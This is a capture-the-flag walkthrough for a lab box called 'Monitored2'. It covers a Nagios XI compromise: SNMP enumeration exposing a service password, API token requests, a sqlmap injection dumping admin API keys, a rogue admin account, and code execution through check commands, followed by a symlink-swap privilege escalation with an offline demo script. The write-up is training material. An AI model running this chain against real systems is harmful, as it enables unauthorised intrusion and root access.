Monitored2

Foothold
1. nmap UDP scan (nmap -sU) to find SNMP open on 161/udp
2. snmpwalk the host; the credentials svc:XjH7VCehowpR1xZB appear in the walk output

3. curl the authenticate endpoint with the svc credentials to get an auth token (the token is short-lived, so request a fresh one right before using it):
curl -k -X POST "https://nagios.monitored.htb/nagiosxi/api/v1/authenticate" -d "username=svc&password=XjH7VCehowpR1xZB"

4. sqlmap the id parameter of banner_message-ajaxhelper.php (authenticated via the token) to dump the api_key of the Nagios admin user from xi_users:
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<auth token>" --level 5 --risk 3 -p id -D nagiosxi -T xi_users -C username,api_key --dump

5. create a new admin user through the API using the dumped admin api_key:
curl -k -X POST "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=<nagios admin api key>&pretty=1" -d "username=baduser&password=baduser&name=baduser&email=baduser@monitored.htb&auth_level=admin"

6. log in to the web UI as the new admin and create a command in "Configure" > "Core Config Manager" > "Commands" whose command line is the payload to execute (e.g. a reverse shell); this is the RCE primitive

7. create a service in "Configure" > "Core Config Manager" > "Services" that uses that command as its check command, apply the configuration and run the check; the payload executes on the host as the user the Nagios process runs as

PrivEsc
1. sudo -l to list the commands the current user can run with sudo
2. among them, find a script that reads the contents of a fixed file path and adds that file to a zip archive
3. replace that file with a symlink pointing at /root/root.txt (ln -sf /root/root.txt <file the script reads>); this only works if the script follows symlinks when it reads the file (cat/cp do; zip with -y would store the link itself)
4. run the script with sudo, then extract the archive to read the root flag
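The PrivEsc chain above, as an added offline demonstration (not part of the original notes, and not the box's actual script, which the notes do not name). A stand-in "privileged" script reads a fixed file path with cat and tars the result; all paths, the fake root flag and the archive location are constructed under a temp dir, and nothing here runs as root. The point it shows is that the attacker controls what the fixed path resolves to, not the script.

```shell
#!/bin/sh
# Added example: simulates a sudo-able script that reads a fixed file and
# archives it, and the symlink swap that turns it into an arbitrary file read.
# Everything is constructed under a temp dir (stand-in paths, fake flag).
set -eu

# Build the lab: a "secret" standing in for /root/root.txt and the file the
# privileged script expects to read.
setup_lab() {
    lab=$(mktemp -d)
    mkdir -p "$lab/root" "$lab/var" "$lab/out"
    printf 'FLAG{constructed-root-flag}\n' > "$lab/root/root.txt"
    printf 'original log content\n' > "$lab/var/app.log"
    echo "$lab"
}

# Stand-in for the sudo-able script: it trusts the fixed path $lab/var/app.log,
# copies its contents into a staging dir with cat (which follows symlinks),
# and archives it. The real script on the box is different; this is hypothetical.
privileged_script() {
    lab=$1
    stage=$(mktemp -d)
    cat "$lab/var/app.log" > "$stage/app.log"
    tar -cf "$lab/out/profile.tar" -C "$stage" app.log
    rm -rf "$stage"
}

# Attacker step 3: replace the expected file with a symlink to the protected one.
plant_symlink() {
    lab=$1
    ln -sf "$lab/root/root.txt" "$lab/var/app.log"
}

# Attacker step 4 (second half): unpack the archive and print the leaked file.
read_leaked() {
    lab=$1
    extract=$(mktemp -d)
    tar -xf "$lab/out/profile.tar" -C "$extract"
    cat "$extract/app.log"
    rm -rf "$extract"
}

# Full chain: lab setup, symlink swap, "sudo" run, read the result.
run_attack() {
    lab=$(setup_lab)
    plant_symlink "$lab"
    privileged_script "$lab"
    read_leaked "$lab"
    rm -rf "$lab"
}

# Stand-alone usage: sh this_file.sh --run
if [ "${1:-}" = "--run" ]; then
    run_attack
fi
```

If you swap `cat` for `tar -cf ... -h`-less archiving of the link itself (or `zip -y`), the archive contains a dangling symlink instead of the file body, which is the check to make before relying on this on a real target.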